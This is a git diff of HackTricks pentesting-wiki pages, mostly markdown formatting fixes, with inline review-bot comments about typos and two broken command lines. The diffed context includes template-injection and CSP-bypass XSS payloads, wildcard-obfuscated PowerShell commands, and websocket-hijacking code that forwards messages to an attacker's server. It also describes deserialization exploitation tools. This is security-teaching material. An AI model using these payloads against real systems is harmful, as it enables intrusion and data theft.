[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). ### Session booleans diff --git a/pentesting-methodology.md b/pentesting-methodology.md index f4101b2c..5df80eb5 100644 
--- a/pentesting-methodology.md +++ b/pentesting-methodology.md @@ -15,7 +15,7 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai LinPEAS, WinPEAS and MacPEAS aren’t enough for you? **Welcome The PEASS Family**, a limited collection of exclusive **NFTs** of our favourite PEASS in disguise, designed by my team. **Go get your favourite and make it yours!** And if you are a PEASS & Hacktricks enthusiast, you can get your hands now on our [**custom swag**](https://peass.creator-spring.com) **and show how much you like our projects!** -You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ +You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. {% endhint %} 
@@ -71,7 +71,7 @@ If at this point you haven't found any interesting vulnerability you **may need Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/). -Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[Check this page]\(windows/av-bypass.md)**.\*\* +Specially in Windows you could need some help to **avoid antiviruses**: \[Check this page]\(windows/av-bypass.md)**.** ## 8- Inside diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md index 91893b8b..85e14dcd 100644 --- a/pentesting-web/cache-deception.md +++ b/pentesting-web/cache-deception.md 
@@ -12,11 +12,11 @@ The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.\ The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not. -In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**. +In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**. ### Identify and evaluate unkeyed inputs -You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there: +You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there: ```markup 
@@ -34,7 +34,7 @@ The header **`Cache-Control`** is also interesting to know if a resource is bein Another interesting header is **`Vary`** . This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.\ One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache. -When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. +When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. ## Examples diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md index fa0bd2e2..724708c8 100644 --- a/pentesting-web/clickjacking.md +++ b/pentesting-web/clickjacking.md 
@@ -154,5 +154,5 @@ See the following documentation for further details and more complex examples: ## References -* ****[**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)**** -* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)**** +* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking) +* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html) diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md index 88bbbed0..e10b68ce 100644 --- a/pentesting-web/client-side-template-injection-csti.md +++ b/pentesting-web/client-side-template-injection-csti.md 
@@ -8,10 +8,10 @@ The way to **test** for this vulnerability is very **similar** as in the case of ## AngularJS - AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute (also known as an AngularJS directive). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.\ +AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute (also known as an AngularJS directive). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.\ For example, if your **input** is being **reflected** inside the **body** of the HTML and the body is defined with `ng-app`: **``** -You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**: +You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**: ```javascript {{$on.constructor('alert(1)')()}} @@ -22,10 +22,10 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
``` -You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) +You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) {% hint style="danger" %} -****[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. +[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. {% endhint %} ## VueJS @@ -58,11 +58,11 @@ Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/resea Credit: [Mario Heiderich](https://twitter.com/cure53berlin) -**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)**** +**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected) ## Mavo -Payload: +Payload: ``` [7*7] 
@@ -78,7 +78,7 @@ javascript:alert(1)%252f%252f..%252fcss-images [self.alert(1)mod1] ``` -**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)**** +**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations) ## **Brute-Force Detection List** diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md index e9d6708d..9e660da5 100644 --- a/pentesting-web/command-injection.md +++ b/pentesting-web/command-injection.md @@ -112,8 +112,8 @@ Online tools to check for DNS based data exfiltration: #### Windows ``` -powershell C:\*\*2\n??e*d.*? # notepad -@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc +powershell C:**2\n??e*d.*? # notepad +@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc ``` #### Linux diff --git a/pentesting-web/content-security-policy-csp-bypass.md b/pentesting-web/content-security-policy-csp-bypass.md index 944601fd..2b9ff45d 100644 --- a/pentesting-web/content-security-policy-csp-bypass.md +++ b/pentesting-web/content-security-policy-csp-bypass.md 
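Review bot: the two `+` lines in the command-injection hunk (`@@ -112,8`) change the meaning of the commands instead of fixing markdown. Inside a fenced code block backslashes are literal, so in `C:\*\*2\n??e*d.*?` and `c:\*\*32\c*?c.e?e` the `\` characters are directory separators between wildcard components, not escapes; the replacements `C:**2\n??e*d.*?` and `c:**32\c*?c.e?e` are no longer valid paths. Keep the original `-` lines here and restrict the `\*` unescaping to prose outside code fences.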
@@ -41,21 +41,21 @@ object-src 'none'; ### Directives -* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. -* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. -* **Child-src**: This directive defines allowed resources for web workers and embedded frame contents. -* **connect-src**: This directive restricts URLs to load using interfaces like fetch, websocket, XMLHttpRequest -* **frame-src**: This directive restricts URLs to which frames can be called out. -* **frame-ancestors**: This directive specifies the sources that can embed the current page. This directive applies to , , , and tags. This directive can't be used in tags and applies only to non-HTML resources. +* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. +* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. +* **Child-src**: This directive defines allowed resources for web workers and embedded frame contents. +* **connect-src**: This directive restricts URLs to load using interfaces like fetch, websocket, XMLHttpRequest +* **frame-src**: This directive restricts URLs to which frames can be called out. +* **frame-ancestors**: This directive specifies the sources that can embed the current page. This directive applies to , , , and tags. This directive can't be used in tags and applies only to non-HTML resources. 
* **img-src**: It defines allowed sources to load images on the web page. * **font-src:** directive specifies valid sources for fonts loaded using `@font-face`. -* **manifest-src**: This directive defines allowed sources of application manifest files. -* **media-src**: It defines allowed sources from where media objects like , and can be loaded. +* **manifest-src**: This directive defines allowed sources of application manifest files. +* **media-src**: It defines allowed sources from where media objects like , and can be loaded. * **object-src**: It defines allowed sources for the \, \, and \ elements elements. -* **base-uri**: It defines allowed URLs which can be loaded using element. -* **form-action**: This directive lists valid endpoints for submission from tags. -* **plugin-types**: It defines limits the kinds of mime types a page may invoke. -* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. +* **base-uri**: It defines allowed URLs which can be loaded using element. +* **form-action**: This directive lists valid endpoints for submission from tags. +* **plugin-types**: It defines limits the kinds of mime types a page may invoke. +* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. * **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy. ### **Sources** 
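Review bot: a few wording problems sit in the rewritten `+` lines of this directive list and can be fixed in the same pass: `**Child-src**` should be lower-case `**child-src**` like every other directive name, the plugin-types line `It defines limits the kinds of mime types a page may invoke` should read `It limits the kinds of MIME types a page may invoke`, and `old URL's` in the upgrade-insecure-requests line should be `old URLs`.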
@@ -123,7 +123,7 @@ Content-Security-Policy: script-src 'self'; object-src 'none' ; If you can upload a JS file you can bypass this CSP: -Working payload: +Working payload: ```markup "/>'> @@ -148,7 +148,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}}
``` -#### Other payloads: +#### Other payloads: ```markup @@ -199,7 +199,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin. If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](dangling-markup-html-scriptless-injection.md). Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\ -****If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. +If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. ```html @@ -214,7 +214,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However, ?search=#x ``` -**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)**** +**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) ### AngularJS and whitelisted domain @@ -253,7 +253,7 @@ 
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle]( You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) -### img-src \*; via XSS (iframe) - Time attack +### img-src \*; via XSS (iframe) - Time attack Notice the lack of the directive `'unsafe-inline'` \ This time you can make the victim **load** a page in **your control** via **XSS** with a ` ``` -### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) +### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) ```javascript document.querySelector('DIV').innerHTML=""; @@ -347,7 +347,7 @@ Trick from [**here**](https://ctftime.org/writeup/29310). ## Policy Injection -**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)**** +**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection) ### Chrome diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md index e585bdf2..8c8c13a4 100644 --- a/pentesting-web/cors-bypass.md +++ b/pentesting-web/cors-bypass.md @@ -60,7 +60,7 @@ xhr.send('Arun'); ### Pre-flight request -Under certain circumstances, when a cross-domain request: +Under certain circumstances, when a cross-domain request: * includes a **non-standard HTTP method (HEAD, GET, POST)** * includes new **headers** 
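Review bot: in the csp-bypass hunk at `@@ -199,7`, the rewritten line `+If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.` is ungrammatical; suggest `make sure to use an https URL in the base tag`.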
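Review bot: in the cors-bypass hunk at `@@ -60,7`, the context bullet `* includes a **non-standard HTTP method (HEAD, GET, POST)**` contradicts itself: GET, HEAD and POST are precisely the methods that do not trigger a preflight, and any other method (PUT, DELETE, PATCH and so on) does. Since the introductory sentence right above it is being rewritten, reword the bullet to `uses a method other than GET, HEAD or POST`.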
@@ -257,7 +257,7 @@ XSSI designates a kind of vulnerability which exploits the fact that, when a res This is especially interesting when it comes to dynamic JavaScript or JSONP when so-called ambient-authority information like cookies are used for authentication. The cookies are included when requesting a resource from a different host. BurpSuite plugin: [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp) -\*\*\*\*[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md)\*\*\*\* +[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md) Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy. diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md index 77bf1582..44510c27 100644 --- a/pentesting-web/crlf-0d-0a.md +++ b/pentesting-web/crlf-0d-0a.md @@ -185,4 +185,4 @@ The best prevention technique is to not use users input directly inside response ## References -* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**** +* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/) diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md index f3900fdc..c0e64901 100644 --- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md +++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md 
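Review bot: `difefrent` in the rewritten link text `[**Read more about the difefrent types of XSSI and how to exploit them here.**]` is a typo for `different`; fix it while the line is being touched.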
@@ -87,7 +87,7 @@ An attacker can create a **malicious web page** on their own domain which **esta ### Simple Attack -Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. +Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.: @@ -127,7 +127,7 @@ wsHook.after = function(messageEvent, url, wsObject) { xhttp.open("GET", "server_msg?m="+messageEvent.data, true); xhttp.send(); return messageEvent; -} +} ``` Now download the `wsHook.js` file from [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) and **save it inside the folder with the web files**.\ @@ -145,6 +145,6 @@ As Web Sockets are a mechanism to **send data to server side and client side**, {% embed url="https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages" %} -**** + \ diff --git a/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md b/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md index 150a26b2..93d222b0 100644 --- a/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md 
+++ b/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md @@ -13,7 +13,7 @@ However, if for whatever reason you **MUST** do it **char by char** (maybe the c Therefore, what you can do is to **add a lot of junk chars** (For example **thousands of "W"s**) to **fill the web page before the secret**. We do this so the image is not loaded at the begging. -However, you make the **bot access the page** with something like +However, you make the **bot access the page** with something like ``` #:~:text=SECR @@ -69,7 +69,7 @@ The previous technique has some drawbacks, check the prerequisites. You either n However, there is another clever technique that uses **CSS `@import`** to improve the quality of the technique. -This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) **** and it works like this: +This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) and it works like this: Instead of loading the same page once and again with tens of different payloads each time (like in the previous one), we are going to **load the page just once and just with an import to the attackers server** (this is the payload to send to the victim): @@ -197,7 +197,7 @@ We still needing an improved method to start the iteration because ` - **Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html) +**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html) This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed. diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md index 82c3b427..69335215 100644 
--- a/pentesting-web/deserialization/README.md +++ b/pentesting-web/deserialization/README.md @@ -17,8 +17,8 @@ Magic method used with serialization: Magic method used with deserialization -* `__wakeup` is called when an object is deserialized. -* `__destruct` is called when PHP script end and object is destroyed. +* `__wakeup` is called when an object is deserialized. +* `__destruct` is called when PHP script end and object is destroyed. * `__toString` uses object as string but also can be used to read file or more than that based on function call inside it. ```php @@ -96,9 +96,9 @@ $ser=serialize($o); ### PHPGGC (ysoserial for PHP) -****[**PHPGCC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\ +[**PHPGCC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\ Note than in several cases you **won't be able to find a way to abuse a deserialization in the source code** of the application but you may be able to **abuse the code of external PHP extensions.**\ -****So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse. +So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse. ### phar:// metadata deserialization 
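Review bot: in the cross-site-websocket-hijacking hunk at `@@ -87,7`, the context sentence after the rewritten line has mismatched emphasis, `if a msg with "**READY"**` (bold opens before READY and closes after the quote) and ends with `**conversation**.:`; suggest `if a message with "**READY**" is sent` and a single full stop.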
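Review bot: in the html-injection-char-by-char-exfiltration hunk at `@@ -13,7`, the context line `so the image is not loaded at the begging` needs `beginning`; worth fixing while this file is open.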
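Review bot: in the html-injection-char-by-char-exfiltration hunk at `@@ -69,7`, the rewritten line `+This was first showed by [**Pepe Vila**]…` should read `first shown by`.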
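Review bot: the tool is misnamed in both rewritten lines of the `@@ -96,9` hunk in deserialization/README.md: `[**PHPGCC**](https://github.com/ambionics/phpggc)` and `the **gadgets** of **PHPGCC**` should say `PHPGGC`, matching the `### PHPGGC (ysoserial for PHP)` heading and the repository URL. In the same lines, `Note than` should be `Note that` and `an even on the **gadgets**` should be `and even on the gadgets`.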
@@ -220,7 +220,7 @@ funcster.deepDeserialize(desertest3) **For**[ **more information read this page**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.** -### ****[**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)**** +### [**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript) The package **doesn’t include any deserialization functionalit**y and requires you to implement it yourself. Their example uses `eval` directly. This is the official deserialisation example: 
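Review bot: the context line `The package **doesn’t include any deserialization functionalit**y` closes the bold one character early, leaving a stray `y` outside it; move the closing `**` after `functionality` while this file is being edited.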
@@ -305,14 +305,14 @@ When running **gadgetinspector** (after building it) don't care about the tons o Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** (and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\ [**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.** \ -****GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.** +GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.** Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\ [**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) \ -****Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations. +Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations. You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\ -[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)**** +[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/) **Serialization Test** 
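Review bot: the rewritten line `+GadgetProbe is focused on ** \`ObjectInputStream\` ** deserializations**.**` still does not render as intended: `**` followed by a space is not a valid bold opener, so the asterisks show up literally, and `**.**` bolds only the full stop. Suggest `GadgetProbe is focused on **\`ObjectInputStream\`** deserializations.`, mirroring the Java Deserialization Scanner line in the same hunk. The Freddy context line `vulns from **Json** an **Yml**` also needs `and`.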
@@ -324,7 +324,7 @@ If you find a java serialized object being sent to a web application, **you can #### **ysoserial** The most well-known tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\ -****Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\ +Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\ I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is. ```bash @@ -403,7 +403,7 @@ You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollecti #### marshalsec -****[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\ +[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\ In order to compile the project I needed to **add** this **dependencies** to `pom.xml`: ```markup 
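Review bot: in the `@@ -324,7` hunk, the context line's link text `[**ysoseral-modified**](https://github.com/pimps/ysoserial-modified)` misspells the project; it should read `ysoserial-modified`, as in the URL.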
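Review bot: in the `@@ -403,7` hunk, the context line `In order to compile the project I needed to **add** this **dependencies** to \`pom.xml\`` should say `these dependencies`.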
@@ -505,7 +505,7 @@ public class LookAheadObjectInputStream extends ObjectInputStream { **Harden All java.io.ObjectInputStream Usage with an Agent** - If you don't own the code or can't wait for a patch, using an agent to weave in hardening to `java.io.ObjectInputStream` is the best solution.\ +If you don't own the code or can't wait for a patch, using an agent to weave in hardening to `java.io.ObjectInputStream` is the best solution.\ Using this approach you can only Blacklist known malicious types and not whitelist them as you don't know which object are being serialized. To enable these agents, simply add a new JVM parameter: @@ -554,7 +554,7 @@ There are several products using this middleware to send messages: So, basically there are a **bunch of services using JMS on a dangerous way**. Therefore, if you have **enough privileges** to send messages to this services (usually you will need valid credentials) you could be able to send **malicious objects serialized that will be deserialized by the consumer/subscriber**.\ This means that in this exploitation all the **clients that are going to use that message will get infected**. -You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability. +You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability. The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to **connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application. 
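Review bot: in the `@@ -554,7` hunk, the context lines around the rewritten sentence have grammar slips worth fixing in the same pass: `using JMS on a dangerous way` should be `in a dangerous way`, and both `send messages to this services` and `connect and attack this services` should be `these services`.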
@@ -591,8 +591,8 @@ If you want to learn about **how does ysoserial.net creates it's exploit** you c The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output` ** and **`--plugin`.** * **`--gadget`** used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands). -* **`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it) -* **`--output` ** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._ +* **`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it) +* **`--output` ** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._ * **`--plugin` ** ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState #### More ysoserial.net parameters 
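Review bot: the rewritten `+* **\`--formatter\`**, used to indicated the method to serialized the exploit` line is ungrammatical; suggest `used to indicate the method used to serialize the exploit`.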
